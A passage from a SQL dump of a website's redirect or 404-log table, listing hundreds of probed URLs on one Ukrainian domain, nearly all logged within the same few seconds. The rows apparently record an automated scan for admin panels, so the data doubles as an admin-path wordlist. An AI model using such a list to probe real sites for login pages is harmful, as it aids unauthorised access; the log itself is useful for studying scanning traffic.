00:00:00',301),(5245,'http://ekvatorprint.com.ua/admin_en',NULL,'','',1,0,'2017-01-20 13:27:28','0000-00-00 00:00:00',301),(5246,'http://ekvatorprint.com.ua/admin_edite.',NULL,'','',1,0,'2017-01-20 13:27:28','0000-00-00 00:00:00',301),(5247,'http://ekvatorprint.com.ua/admin_expired.php',NULL,'','',1,0,'2017-01-20 13:27:28','0000-00-00 00:00:00',301),(5248,'http://ekvatorprint.com.ua/admin_expired.',NULL,'','',1,0,'2017-01-20 13:27:28','0000-00-00 00:00:00',301),(5249,'http://ekvatorprint.com.ua/admin_forums.php',NULL,'','',1,0,'2017-01-20 13:27:28','0000-00-00 00:00:00',301),(5250,'http://ekvatorprint.com.ua/admin_events',NULL,'','',1,0,'2017-01-20 13:27:28','0000-00-00 00:00:00',301),(5251,'http://ekvatorprint.com.ua/admin_files',NULL,'','',1,0,'2017-01-20 13:27:28','0000-00-00 00:00:00',301),(5252,'http://ekvatorprint.com.ua/admin_gespro',NULL,'','',1,0,'2017-01-20 13:27:28','0000-00-00 00:00:00',301),(5253,'http://ekvatorprint.com.ua/admin_forums.',NULL,'','',1,0,'2017-01-20 13:27:28','0000-00-00 00:00:00',301),(5254,'http://ekvatorprint.com.ua/admin_groups.php',NULL,'','',1,0,'2017-01-20 13:27:28','0000-00-00 00:00:00',301),(5255,'http://ekvatorprint.com.ua/admin_home.php',NULL,'','',1,0,'2017-01-20 13:27:28','0000-00-00 00:00:00',301),(5256,'http://ekvatorprint.com.ua/admin_groups.',NULL,'','',1,0,'2017-01-20 13:27:28','0000-00-00 00:00:00',301),(5257,'http://ekvatorprint.com.ua/admin_guestbook.php',NULL,'','',1,0,'2017-01-20 13:27:28','0000-00-00 00:00:00',301),(5258,'http://ekvatorprint.com.ua/admin_help',NULL,'','',1,0,'2017-01-20 13:27:28','0000-00-00 00:00:00',301),(5259,'http://ekvatorprint.com.ua/admin_guestbook.',NULL,'','',1,0,'2017-01-20 13:27:28','0000-00-00 00:00:00',301),(5260,'http://ekvatorprint.com.ua/admin_home.',NULL,'','',1,0,'2017-01-20 13:27:28','0000-00-00 00:00:00',301),(5261,'http://ekvatorprint.com.ua/admin_images',NULL,'','',1,0,'2017-01-20 13:27:28','0000-00-00 00:00:00',301),(5262,'http://ekvatorprint.com.ua/admin_imgmod.php',NULL,'','',1,0,'2017-01-20 13:27:28','0000-00-00 00:00:00',301),(5263,'http://ekvatorprint.com.ua/admin_imgmod.',NULL,'','',1,0,'2017-01-20 13:27:28','0000-00-00 00:00:00',301),(5264,'http://ekvatorprint.com.ua/admin_imob_1',NULL,'','',1,0,'2017-01-20 13:27:28','0000-00-00 00:00:00',301),(5265,'http://ekvatorprint.com.ua/admin_imob_2',NULL,'','',1,0,'2017-01-20 13:27:28','0000-00-00 00:00:00',301),(5266,'http://ekvatorprint.com.ua/admin_index.php',NULL,'','',1,0,'2017-01-20 13:27:28','0000-00-00 00:00:00',301),(5267,'http://ekvatorprint.com.ua/admin_info.php',NULL,'','',1,0,'2017-01-20 13:27:28','0000-00-00 00:00:00',301),(5268,'http://ekvatorprint.com.ua/admin_index.',NULL,'','',1,0,'2017-01-20 13:27:28','0000-00-00 00:00:00',301),(5269,'http://ekvatorprint.com.ua/admin_iprev.php',NULL,'','',1,0,'2017-01-20 13:27:28','0000-00-00 00:00:00',301),(5270,'http://ekvatorprint.com.ua/admin_info.',NULL,'','',1,0,'2017-01-20 13:27:28','0000-00-00 00:00:00',301),(5271,'http://ekvatorprint.com.ua/admin_iprev.',NULL,'','',1,0,'2017-01-20 13:27:28','0000-00-00 00:00:00',301),(5272,'http://ekvatorprint.com.ua/admin_js',NULL,'','',1,0,'2017-01-20 13:27:28','0000-00-00 00:00:00',301),(5273,'http://ekvatorprint.com.ua/admin_ldown.php',NULL,'','',1,0,'2017-01-20 13:27:29','0000-00-00 00:00:00',301),(5274,'http://ekvatorprint.com.ua/admin_ldown.',NULL,'','',1,0,'2017-01-20 13:27:29','0000-00-00 00:00:00',301),(5275,'http://ekvatorprint.com.ua/admin_left.php',NULL,'','',1,0,'2017-01-20 13:27:29','0000-00-00 00:00:00',301),(5276,'http://ekvatorprint.com.ua/admin_left.',NULL,'','',1,0,'2017-01-20 13:27:29','0000-00-00 00:00:00',301),(5277,'http://ekvatorprint.com.ua/admin_links.php',NULL,'','',1,0,'2017-01-20 13:27:29','0000-00-00 00:00:00',301),(5278,'http://ekvatorprint.com.ua/admin_loader.',NULL,'','',1,0,'2017-01-20 13:27:29','0000-00-00 00:00:00',301),(5279,'http://ekvatorprint.com.ua/admin_loader.php',NULL,'','',1,0,'2017-01-20 13:27:29','0000-00-00 00:00:00',301),(5280,'http://ekvatorprint.com.ua/admin_login',NULL,'','',1,0,'2017-01-20 13:27:29','0000-00-00 00:00:00',301),(5281,'http://ekvatorprint.com.ua/admin_login.',NULL,'','',1,0,'2017-01-20 13:27:29','0000-00-00 00:00:00',301),(5282,'http://ekvatorprint.com.ua/admin_login.php',NULL,'','',3,0,'2017-01-20 13:27:29','0000-00-00 00:00:00',301),(5283,'http://ekvatorprint.com.ua/admin_login.html',NULL,'','',1,0,'2017-01-20 13:27:29','0000-00-00 00:00:00',301),(5284,'http://ekvatorprint.com.ua/admin_logon.php',NULL,'','',1,0,'2017-01-20 13:27:29','0000-00-00 00:00:00',301),(5285,'http://ekvatorprint.com.ua/admin_logon',NULL,'','',1,0,'2017-01-20 13:27:29','0000-00-00 00:00:00',301),(5286,'http://ekvatorprint.com.ua/admin_logon.',NULL,'','',1,0,'2017-01-20 13:27:29','0000-00-00 00:00:00',301),(5287,'http://ekvatorprint.com.ua/admin_logout.php',NULL,'','',1,0,'2017-01-20 13:27:29','0000-00-00 00:00:00',301),(5288,'http://ekvatorprint.com.ua/admin_logs.',NULL,'','',1,0,'2017-01-20 13:27:29','0000-00-00 00:00:00',301),(5289,'http://ekvatorprint.com.ua/admin_logs.php',NULL,'','',1,0,'2017-01-20 13:27:29','0000-00-00 00:00:00',301),(5290,'http://ekvatorprint.com.ua/admin_main',NULL,'','',1,0,'2017-01-20 13:27:29','0000-00-00 00:00:00',301),(5291,'http://ekvatorprint.com.ua/admin_main.php',NULL,'','',1,0,'2017-01-20 13:27:29','0000-00-00 00:00:00',301),(5292,'http://ekvatorprint.com.ua/admin_main.',NULL,'','',1,0,'2017-01-20 13:27:29','0000-00-00 00:00:00',301),(5293,'http://ekvatorprint.com.ua/admin_manage',NULL,'','',1,0,'2017-01-20 13:27:29','0000-00-00 00:00:00',301),(5294,'http://ekvatorprint.com.ua/admin_main.txt',NULL,'','',1,0,'2017-01-20 13:27:29','0000-00-00 00:00:00',301),(5295,'http://ekvatorprint.com.ua/admin_media',NULL,'','',1,0,'2017-01-20 13:27:29','0000-00-00 00:00:00',301),(5296,'http://ekvatorprint.com.ua/admin_members.php',NULL,'','',1,0,'2017-01-20 13:27:29','0000-00-00 00:00:00',301),(5297,'http://ekvatorprint.com.ua/admin_menu',NULL,'','',1,0,'2017-01-20 13:27:29','0000-00-00 00:00:00',301),(5298,'http://ekvatorprint.com.ua/admin_members.',NULL,'','',1,0,'2017-01-20 13:27:29','0000-00-00 00:00:00',301),(5299,'http://ekvatorprint.com.ua/admin_menu.php',NULL,'','',1,0,'2017-01-20 13:27:29','0000-00-00 00:00:00',301),(5300,'http://ekvatorprint.com.ua/admin_menu.',NULL,'','',1,0,'2017-01-20 13:27:29','0000-00-00 00:00:00',301),(5301,'http://ekvatorprint.com.ua/admin_messages.php',NULL,'','',1,0,'2017-01-20 13:27:29','0000-00-00 00:00:00',301),(5302,'http://ekvatorprint.com.ua/admin_messages.',NULL,'','',1,0,'2017-01-20 13:27:29','0000-00-00 00:00:00',301),(5303,'http://ekvatorprint.com.ua/admin_my_avatar.php',NULL,'','',1,0,'2017-01-20 13:27:29','0000-00-00 00:00:00',301),(5304,'http://ekvatorprint.com.ua/admin_my_avatar.',NULL,'','',1,0,'2017-01-20 13:27:29','0000-00-00 00:00:00',301),(5305,'http://ekvatorprint.com.ua/admin_navigation',NULL,'','',1,0,'2017-01-20 13:27:30','0000-00-00 00:00:00',301),(5306,'http://ekvatorprint.com.ua/admin_netref',NULL,'','',1,0,'2017-01-20 13:27:30','0000-00-00 00:00:00',301),(5307,'http://ekvatorprint.com.ua/admin_neu',NULL,'','',1,0,'2017-01-20 13:27:30','0000-00-00 00:00:00',301),(5308,'http://ekvatorprint.com.ua/admin_new',NULL,'','',1,0,'2017-01-20 13:27:30','0000-00-00 00:00:00',301),(5309,'http://ekvatorprint.com.ua/admin_news',NULL,'','',1,0,'2017-01-20 13:27:30','0000-00-00 00:00:00',301),(5310,'http://ekvatorprint.com.ua/admin_news.php',NULL,'','',1,0,'2017-01-20 13:27:30','0000-00-00 00:00:00',301),(5311,'http://ekvatorprint.com.ua/admin_news.',NULL,'','',1,0,'2017-01-20 13:27:30','0000-00-00 00:00:00',301),(5312,'http://ekvatorprint.com.ua/admin_newspost.php',NULL,'','',1,0,'2017-01-20 13:27:30','0000-00-00 00:00:00',301),(5313,'http://ekvatorprint.com.ua/admin_newspost.',NULL,'','',1,0,'2017-01-20 13:27:30','0000-00-00 00:00:00',301),(5314,'http://ekvatorprint.com.ua/admin_nonssl',NULL,'','',1,0,'2017-01-20 13:27:30','0000-00-00 00:00:00',301),(5315,'http://ekvatorprint.com.ua/admin_old',NULL,'','',1,0,'2017-01-20 13:27:30','0000-00-00 00:00:00',301),(5316,'http://ekvatorprint.com.ua/admin_options.php',NULL,'','',1,0,'2017-01-20 13:27:30','0000-00-00 00:00:00',301),(5317,'http://ekvatorprint.com.ua/admin_options.',NULL,'','',1,0,'2017-01-20 13:27:30','0000-00-00 00:00:00',301),(5318,'http://ekvatorprint.com.ua/admin_online',NULL,'','',1,0,'2017-01-20 13:27:30','0000-00-00 00:00:00',301),(5319,'http://ekvatorprint.com.ua/admin_pages',NULL,'','',1,0,'2017-01-20 13:27:30','0000-00-00 00:00:00',301),(5320,'http://ekvatorprint.com.ua/admin_customer',NULL,'','',1,0,'2017-01-20 13:27:30','0000-00-00 00:00:00',301),(5321,'http://ekvatorprint.com.ua/admin_panel',NULL,'','',1,0,'2017-01-20 13:27:30','0000-00-00 00:00:00',301),(5322,'http://ekvatorprint.com.ua/admin_panel.php',NULL,'','',1,0,'2017-01-20 13:27:30','0000-00-00 00:00:00',301),(5323,'http://ekvatorprint.com.ua/admin_panel.',NULL,'','',1,0,'2017-01-20 13:27:30','0000-00-00 00:00:00',301),(5324,'http://ekvatorprint.com.ua/admin_partner',NULL,'','',1,0,'2017-01-20 13:27:30','0000-00-00 00:00:00',301),(5325,'http://ekvatorprint.com.ua/admin_paylog.',NULL,'','',1,0,'2017-01-20 13:27:30','0000-00-00 00:00:00',301),(5326,'http://ekvatorprint.com.ua/admin_paylog.php',NULL,'','',1,0,'2017-01-20 13:27:30','0000-00-00 00:00:00',301),(5327,'http://ekvatorprint.com.ua/admin_payment.php',NULL,'','',1,0,'2017-01-20 13:27:30','0000-00-00 00:00:00',301),(5328,'http://ekvatorprint.com.ua/admin_picks.php',NULL,'','',1,0,'2017-01-20 13:27:30','0000-00-00 00:00:00',301),(5329,'http://ekvatorprint.com.ua/admin_pending.',NULL,'','',1,0,'2017-01-20 13:27:30','0000-00-00 00:00:00',301),(5330,'http://ekvatorprint.com.ua/admin_pdf.',NULL,'','',1,0,'2017-01-20 13:27:30','0000-00-00 00:00:00',301),(5331,'http://ekvatorprint.com.ua/admin_payment.',NULL,'','',1,0,'2017-01-20 13:27:30','0000-00-00 00:00:00',301),(5332,'http://ekvatorprint.com.ua/admin_pc',NULL,'','',1,0,'2017-01-20 13:27:30','0000-00-00 00:00:00',301),(5333,'http://ekvatorprint.com.ua/admin_pending.php',NULL,'','',1,0,'2017-01-20 13:27:30','0000-00-00 00:00:00',301),(5334,'http://ekvatorprint.com.ua/admin_pdf.php',NULL,'','',1,0,'2017-01-20 13:27:30','0000-00-00 00:00:00',301),(5335,'http://ekvatorprint.com.ua/admin_pcc',NULL,'','',1,0,'2017-01-20 13:27:30','0000-00-00 00:00:00',301),(5336,'http://ekvatorprint.com.ua/admin_picks.',NULL,'','',1,0,'2017-01-20 13:27:31','0000-00-00 00:00:00',301),(5337,'http://ekvatorprint.com.ua/admin_pmmaint.php',NULL,'','',1,0,'2017-01-20 13:27:31','0000-00-00 00:00:00',301),(5338,'http://ekvatorprint.com.ua/admin_pn',NULL,'','',1,0,'2017-01-20 13:27:31','0000-00-00 00:00:00',301),(5339,'http://ekvatorprint.com.ua/admin_poll.',NULL,'','',1,0,'2017-01-20 13:27:31','0000-00-00 00:00:00',301),(5340,'http://ekvatorprint.com.ua/admin_pmmaint.',NULL,'','',1,0,'2017-01-20 13:27:31','0000-00-00 00:00:00',301),(5341,'http://ekvatorprint.com.ua/admin_policy.php',NULL,'','',1,0,'2017-01-20 13:27:31','0000-00-00 00:00:00',301),(5342,'http://ekvatorprint.com.ua/admin_poll.php',NULL,'','',1,0,'2017-01-20 13:27:31','0000-00-00 00:00:00',301),(5343,'http://ekvatorprint.com.ua/admin_policy.',NULL,'','',1,0,'2017-01-20 13:27:31','0000-00-00 00:00:00',301),(5344,'http://ekvatorprint.com.ua/admin_pop_mail.php',NULL,'','',1,0,'2017-01-20 13:27:31','0000-00-00 00:00:00',301),(5345,'http://ekvatorprint.com.ua/admin_pop_mail.',NULL,'','',1,0,'2017-01-20 13:27:31','0000-00-00 00:00:00',301),(5346,'http://ekvatorprint.com.ua/admin_postings.',NULL,'','',1,0,'2017-01-20 13:27:31','0000-00-00 00:00:00',301),(5347,'http://ekvatorprint.com.ua/admin_postings.php',NULL,'','',1,0,'2017-01-20 13:27:31','0000-00-00 00:00:00',301),(5348,'http://ekvatorprint.com.ua/admin_ppc',NULL,'','',1,0,'2017-01-20 13:27:31','0000-00-00 00:00:00',301),(5349,'http://ekvatorprint.com.ua/admin_pragma6',NULL,'','',1,0,'2017-01-20 13:27:31','0000-00-00 00:00:00',301),(5350,'http://ekvatorprint.com.ua/admin_pr',NULL,'','',1,0,'2017-01-20 13:27:31','0000-00-00 00:00:00',301),(5351,'http://ekvatorprint.com.ua/admin_private',NULL,'','',1,0,'2017-01-20 13:27:31','0000-00-00 00:00:00',301),(5352,'http://ekvatorprint.com.ua/admin_process.php',NULL,'','',1,0,'2017-01-20 13:27:31','0000-00-00 00:00:00',301),(5353,'http://ekvatorprint.com.ua/admin_process.',NULL,'','',1,0,'2017-01-20 13:27:31','0000-00-00 00:00:00',301),(5354,'http://ekvatorprint.com.ua/admin_report',NULL,'','',1,0,'2017-01-20 13:27:31','0000-00-00 00:00:00',301),(5355,'http://ekvatorprint.com.ua/admin_reports',NULL,'','',1,0,'2017-01-20 13:27:31','0000-00-00 00:00:00',301),(5356,'http://ekvatorprint.com.ua/admin_reset.php',NULL,'','',1,0,'2017-01-20 13:27:31','0000-00-00 00:00:00',301),(5357,'http://ekvatorprint.com.ua/admin_reset.',NULL,'','',1,0,'2017-01-20 13:27:31','0000-00-00 00:00:00',301),(5358,'http://ekvatorprint.com.ua/admin_review',NULL,'','',1,0,'2017-01-20 13:27:31','0000-00-00 00:00:00',301),(5359,'http://ekvatorprint.com.ua/admin_rotator.php',NULL,'','',1,0,'2017-01-20 13:27:31','0000-00-00 00:00:00',301),(5360,'http://ekvatorprint.com.ua/admin_rotator.',NULL,'','',1,0,'2017-01-20 13:27:31','0000-00-00 00:00:00',301),(5361,'http://ekvatorprint.com.ua/admin_rules.php',NULL,'','',1,0,'2017-01-20 13:27:31','0000-00-00 00:00:00',301),(5362,'http://ekvatorprint.com.ua/admin_rules.',NULL,'','',1,0,'2017-01-20 13:27:31','0000-00-00 00:00:00',301),(5363,'http://ekvatorprint.com.ua/admin_save',NULL,'','',1,0,'2017-01-20 13:27:31','0000-00-00 00:00:00',301),(5364,'http://ekvatorprint.com.ua/admin_scripts',NULL,'','',1,0,'2017-01-20 13:27:31','0000-00-00 00:00:00',301),(5365,'http://ekvatorprint.com.ua/admin_search.php',NULL,'','',1,0,'2017-01-20 13:27:31','0000-00-00 00:00:00',301),(5366,'http://ekvatorprint.com.ua/admin_search.',NULL,'','',1,0,'2017-01-20 13:27:31','0000-00-00 00:00:00',301),(5367,'http://ekvatorprint.com.ua/admin_search_ip.php',NULL,'','',1,0,'2017-01-20 13:27:31','0000-00-00 00:00:00',301),(5368,'http://ekvatorprint.com.ua/admin_search_ip.',NULL,'','',1,0,'2017-01-20 13:27:31','0000-00-00 00:00:00',301),(5369,'http://ekvatorprint.com.ua/admin_searchlog.php',NULL,'','',1,0,'2017-01-20 13:27:31','0000-00-00 00:00:00',301),(5370,'http://ekvatorprint.com.ua/admin_searchlog.',NULL,'','',1,0,'2017-01-20 13:27:32','0000-00-00 00:00:00',301),(5371,'http://ekvatorprint.com.ua/admin_settings.php',NULL,'','',1,0,'2017-01-20 13:27:32','0000-00-00 00:00:00',301),(5372,'http://ekvatorprint.com.ua/admin_secure',NULL,'','',1,0,'2017-01-20 13:27:32','0000-00-00 00:00:00',301),(5373,'http://ekvatorprint.com.ua/admin_settings.',NULL,'','',1,0,'2017-01-20 13:27:32','0000-00-00 00:00:00',301),(5374,'http://ekvatorprint.com.ua/admin_setup.php',NULL,'','',1,0,'2017-01-20 13:27:32','0000-00-00 00:00:00',301),(5375,'http://ekvatorprint.com.ua/admin_setup.',NULL,'','',1,0,'2017-01-20 13:27:32','0000-00-00 00:00:00',301),(5376,'http://ekvatorprint.com.ua/admin_links.',NULL,'','',1,0,'2017-01-20 13:27:32','0000-00-00 00:00:00',301),(5377,'http://ekvatorprint.com.ua/admin_shop',NULL,'','',1,0,'2017-01-20 13:27:32','0000-00-00 00:00:00',301),(5378,'http://ekvatorprint.com.ua/admin_site',NULL,'','',1,0,'2017-01-20 13:27:32','0000-00-00 00:00:00',301),(5379,'http://ekvatorprint.com.ua/admin_sitestat.php',NULL,'','',1,0,'2017-01-20 13:27:32','0000-00-00 00:00:00',301),(5380,'http://ekvatorprint.com.ua/admin_sitestat.',NULL,'','',1,0,'2017-01-20 13:27:32','0000-00-00 00:00:00',301),(5381,'http://ekvatorprint.com.ua/admin_story.',NULL,'','',1,0,'2017-01-20 13:27:32','0000-00-00 00:00:00',301),(5382,'http://ekvatorprint.com.ua/admin_story.php',NULL,'','',1,0,'2017-01-20 13:27:32','0000-00-00 00:00:00',301),(5383,'http://ekvatorprint.com.ua/admin_store',NULL,'','',1,0,'2017-01-20 13:27:32','0000-00-00 00:00:00',301),(5384,'http://ekvatorprint.com.ua/admin_staff',NULL,'','',1,0,'2017-01-20 13:27:32','0000-00-00 00:00:00',301),(5385,'http://ekvatorprint.com.ua/admin_stuff',NULL,'','',1,0,'2017-01-20 13:27:32','0000-00-00 00:00:00',301),(5386,'http://ekvatorprint.com.ua/admin_super',NULL,'','',1,0,'2017-01-20 13:27:32','0000-00-00 00:00:00',301),(5387,'http://ekvatorprint.com.ua/admin_sync.php',NULL,'','',1,0,'2017-01-20 13:27:32','0000-00-00 00:00:00',301),(5388,'http://ekvatorprint.com.ua/admin_logout.',NULL,'','',1,0,'2017-01-20 13:27:32','0000-00-00 00:00:00',301),(5389,'http://ekvatorprint.com.ua/admin_sync.',NULL,'','',1,0,'2017-01-20 13:27:32','0000-00-00 00:00:00',301),(5390,'http://ekvatorprint.com.ua/admin_tdet.php',NULL,'','',1,0,'2017-01-20 13:27:32','0000-00-00 00:00:00',301),(5391,'http://ekvatorprint.com.ua/admin_temp',NULL,'','',1,0,'2017-01-20 13:27:32','0000-00-00 00:00:00',301),(5392,'http://ekvatorprint.com.ua/admin_tdet.',NULL,'','',1,0,'2017-01-20 13:27:32','0000-00-00 00:00:00',301),(5393,'http://ekvatorprint.com.ua/admin_template.php',NULL,'','',1,0,'2017-01-20 13:27:32','0000-00-00 00:00:00',301),(5394,'http://ekvatorprint.com.ua/admin_template.',NULL,'','',1,0,'2017-01-20 13:27:32','0000-00-00 00:00:00',301),(5395,'http://ekvatorprint.com.ua/admin_templates',NULL,'','',1,0,'2017-01-20 13:27:32','0000-00-00 00:00:00',301),(5396,'http://ekvatorprint.com.ua/admin_test.php',NULL,'','',1,0,'2017-01-20 13:27:32','0000-00-00 00:00:00',301),(5397,'http://ekvatorprint.com.ua/admin_test',NULL,'','',1,0,'2017-01-20 13:27:32','0000-00-00 00:00:00',301),(5398,'http://ekvatorprint.com.ua/admin_test.',NULL,'','',1,0,'2017-01-20 13:27:32','0000-00-00 00:00:00',301),(5399,'http://ekvatorprint.com.ua/admin_tool',NULL,'','',1,0,'2017-01-20 13:27:32','0000-00-00 00:00:00',301),(5400,'http://ekvatorprint.com.ua/admin_tools',NULL,'','',1,0,'2017-01-20 13:27:32','0000-00-00 00:00:00',301),(5401,'http://ekvatorprint.com.ua/admin_top.',NULL,'','',1,0,'2017-01-20 13:27:32','0000-00-00 00:00:00',301),(5402,'http://ekvatorprint.com.ua/admin_top.php',NULL,'','',1,0,'2017-01-20 13:27:32','0000-00-00 00:00:00',301),(5403,'http://ekvatorprint.com.ua/admin_udown.php',NULL,'','',1,0,'2017-01-20 13:27:32','0000-00-00 00:00:00',301),(5404,'http://ekvatorprint.com.ua/admin_tpl',NULL,'','',1,0,'2017-01-20 13:27:32','0000-00-00 00:00:00',301),(5405,'http://ekvatorprint.com.ua/admin_udown.',NULL,'','',1,0,'2017-01-20 13:27:32','0000-00-00 00:00:00',301),(5406,'http://ekvatorprint.com.ua/admin_update.php',NULL,'','',1,0,'2017-01-20 13:27:32','0000-00-00 00:00:00',301),(5407,'http://ekvatorprint.com.ua/admin_user',NULL,'','',1,0,'2017-01-20 13:27:32','0000-00-00 00:00:00',301),(5408,'http://ekvatorprint.com.ua/admin_update.',NULL,'','',1,0,'2017-01-20 13:27:32','0000-00-00 00:00:00',301),(5409,'http://ekvatorprint.com.ua/admin_user.php',NULL,'','',1,0,'2017-01-20 13:27:32','0000-00-00 00:00:00',301),(5410,'http://ekvatorprint.com.ua/admin_user.',NULL,'','',1,0,'2017-01-20 13:27:32','0000-00-00 00:00:00',301),(5411,'http://ekvatorprint.com.ua/admin_userdet.php',NULL,'','',1,0,'2017-01-20 13:27:32','0000-00-00 00:00:00',301),(5412,'http://ekvatorprint.com.ua/admin_users',NULL,'','',1,0,'2017-01-20 13:27:33','0000-00-00 00:00:00',301),(5413,'http://ekvatorprint.com.ua/admin_userdet.',NULL,'','',1,0,'2017-01-20 13:27:33','0000-00-00 00:00:00',301),(5414,'http://ekvatorprint.com.ua/admin_users.php',NULL,'','',1,0,'2017-01-20 13:27:33','0000-00-00 00:00:00',301),(5415,'http://ekvatorprint.com.ua/admin_usrmgr.php',NULL,'','',1,0,'2017-01-20 13:27:33','0000-00-00 00:00:00',301),(5416,'http://ekvatorprint.com.ua/admin_users.',NULL,'','',1,0,'2017-01-20 13:27:33','0000-00-00 00:00:00',301),(5417,'http://ekvatorprint.com.ua/admin_usrmgr.',NULL,'','',1,0,'2017-01-20 13:27:33','0000-00-00 00:00:00',301),(5418,'http://ekvatorprint.com.ua/admin_util',NULL,'','',1,0,'2017-01-20 13:27:33','0000-00-00 00:00:00',301),(5419,'http://ekvatorprint.com.ua/admin_website',NULL,'','',1,0,'2017-01-20 13:27:33','0000-00-00 00:00:00',301),(5420,'http://ekvatorprint.com.ua/admin_web',NULL,'','',1,0,'2017-01-20 13:27:33','0000-00-00 00:00:00',301),(5421,'http://ekvatorprint.com.ua/admin_welcome.php',NULL,'','',1,0,'2017-01-20 13:27:33','0000-00-00 00:00:00',301),(5422,'http://ekvatorprint.com.ua/admin_wjg',NULL,'','',1,0,'2017-01-20 13:27:33','0000-00-00 00:00:00',301),(5423,'http://ekvatorprint.com.ua/admin_welcome.',NULL,'','',1,0,'2017-01-20 13:27:33','0000-00-00 00:00:00',301),(5424,'http://ekvatorprint.com.ua/admina.',NULL,'','',1,0,'2017-01-20 13:27:33','0000-00-00 00:00:00',301),(5425,'http://ekvatorprint.com.ua/admina',NULL,'','',1,0,'2017-01-20 13:27:33','0000-00-00 00:00:00',301),(5426,'http://ekvatorprint.com.ua/adminarea',NULL,'','',1,0,'2017-01-20 13:27:33','0000-00-00 00:00:00',301),(5427,'http://ekvatorprint.com.ua/admina.php',NULL,'','',1,0,'2017-01-20 13:27:33','0000-00-00 00:00:00',301),(5428,'http://ekvatorprint.com.ua/adminandy',NULL,'','',1,0,'2017-01-20 13:27:33','0000-00-00 00:00:00',301),(5429,'http://ekvatorprint.com.ua/adminarea/admin.php',NULL,'','',1,0,'2017-01-20 13:27:33','0000-00-00 00:00:00',301),(5430,'http://ekvatorprint.com.ua/adminarea/',NULL,'','',1,0,'2017-01-20 13:27:33','0000-00-00 00:00:00',301),(5431,'http://ekvatorprint.com.ua/adminarea/admin.',NULL,'','',1,0,'2017-01-20 13:27:33','0000-00-00 00:00:00',301),(5432,'http://ekvatorprint.com.ua/adminarea/admin.html',NULL,'','',1,0,'2017-01-20 13:27:33','0000-00-00 00:00:00',301),(5433,'http://ekvatorprint.com.ua/adminarea/index.php',NULL,'','',1,0,'2017-01-20 13:27:33','0000-00-00 00:00:00',301),(5434,'http://ekvatorprint.com.ua/adminarea/index.html',NULL,'','',1,0,'2017-01-20 13:27:33','0000-00-00 00:00:00',301),(5435,'http://ekvatorprint.com.ua/adminarea/index.',NULL,'','',1,0,'2017-01-20 13:27:33','0000-00-00 00:00:00',301),(5436,'http://ekvatorprint.com.ua/adminarea/login.php',NULL,'','',1,0,'2017-01-20 13:27:33','0000-00-00 00:00:00',301),(5437,'http://ekvatorprint.com.ua/adminbackups',NULL,'','',1,0,'2017-01-20 13:27:33','0000-00-00 00:00:00',301),(5438,'http://ekvatorprint.com.ua/adminarea/login.',NULL,'','',1,0,'2017-01-20 13:27:33','0000-00-00 00:00:00',301),(5439,'http://ekvatorprint.com.ua/adminarea/login.html',NULL,'','',1,0,'2017-01-20 13:27:33','0000-00-00 00:00:00',301),(5440,'http://ekvatorprint.com.ua/adminbanners.php',NULL,'','',1,0,'2017-01-20 13:27:33','0000-00-00 00:00:00',301),(5441,'http://ekvatorprint.com.ua/adminbb',NULL,'','',1,0,'2017-01-20 13:27:33','0000-00-00 00:00:00',301),(5442,'http://ekvatorprint.com.ua/adminbecas',NULL,'','',1,0,'2017-01-20 13:27:33','0000-00-00 00:00:00',301),(5443,'http://ekvatorprint.com.ua/adminbereich',NULL,'','',1,0,'2017-01-20 13:27:33','0000-00-00 00:00:00',301),(5444,'http://ekvatorprint.com.ua/adminbanners.',NULL,'','',1,0,'2017-01-20 13:27:33','0000-00-00 00:00:00',301),(5445,'http://ekvatorprint.com.ua/adminbeta',NULL,'','',1,0,'2017-01-20 13:27:33','0000-00-00 00:00:00',301),(5446,'http://ekvatorprint.com.ua/adminblog',NULL,'','',1,0,'2017-01-20 13:27:33','0000-00-00 00:00:00',301),(5447,'http://ekvatorprint.com.ua/admincatgroup.php',NULL,'','',1,0,'2017-01-20 13:27:33','0000-00-00 00:00:00',301),(5448,'http://ekvatorprint.com.ua/adminc',NULL,'','',1,0,'2017-01-20 13:27:33','0000-00-00 00:00:00',301),(5449,'http://ekvatorprint.com.ua/adminc.',NULL,'','',1,0,'2017-01-20 13:27:33','0000-00-00 00:00:00',301),(5450,'http://ekvatorprint.com.ua/adminc.php',NULL,'','',1,0,'2017-01-20 13:27:33','0000-00-00 00:00:00',301),(5451,'http://ekvatorprint.com.ua/admincenter',NULL,'','',1,0,'2017-01-20 13:27:33','0000-00-00 00:00:00',301),(5452,'http://ekvatorprint.com.ua/admincc',NULL,'','',1,0,'2017-01-20 13:27:33','0000-00-00 00:00:00',301),(5453,'http://ekvatorprint.com.ua/admincby',NULL,'','',1,0,'2017-01-20 13:27:33','0000-00-00 00:00:00',301),(5454,'http://ekvatorprint.com.ua/admincatgroup.',NULL,'','',1,0,'2017-01-20 13:27:34','0000-00-00 00:00:00',301),(5455,'http://ekvatorprint.com.ua/admincenter.php',NULL,'','',1,0,'2017-01-20 13:27:34','0000-00-00 00:00:00',301),(5456,'http://ekvatorprint.com.ua/admincheg',NULL,'','',1,0,'2017-01-20 13:27:34','0000-00-00 00:00:00',301),(5457,'http://ekvatorprint.com.ua/adminclude',NULL,'','',1,0,'2017-01-20 13:27:34','0000-00-00 00:00:00',301),(5458,'http://ekvatorprint.com.ua/admincenter.',NULL,'','',1,0,'2017-01-20 13:27:34','0000-00-00 00:00:00',301),(5459,'http://ekvatorprint.com.ua/admincms',NULL,'','',1,0,'2017-01-20 13:27:34','0000-00-00 00:00:00',301),(5460,'http://ekvatorprint.com.ua/admincodes',NULL,'','',1,0,'2017-01-20 13:27:34','0000-00-00 00:00:00',301),(5461,'http://ekvatorprint.com.ua/adminconsole',NULL,'','',1,0,'2017-01-20 13:27:34','0000-00-00 00:00:00',301),(5462,'http://ekvatorprint.com.ua/admincontent',NULL,'','',1,0,'2017-01-20 13:27:34','0000-00-00 00:00:00',301),(5463,'http://ekvatorprint.com.ua/admincontrol.php',NULL,'','',2,0,'2017-01-20 13:27:34','0000-00-00 00:00:00',301),(5464,'http://ekvatorprint.com.ua/admincontrol.',NULL,'','',1,0,'2017-01-20 13:27:34','0000-00-00 00:00:00',301),(5465,'http://ekvatorprint.com.ua/admincontrol.html',NULL,'','',1,0,'2017-01-20 13:27:34','0000-00-00 00:00:00',301),(5466,'http://ekvatorprint.com.ua/admincontrol/login.php',NULL,'','',1,0,'2017-01-20 13:27:34','0000-00-00 00:00:00',301),(5467,'http://ekvatorprint.com.ua/admincontrol/login.html',NULL,'','',1,0,'2017-01-20 13:27:34','0000-00-00 00:00:00',301),(5468,'http://ekvatorprint.com.ua/admincontrol/login.',NULL,'','',1,0,'2017-01-20 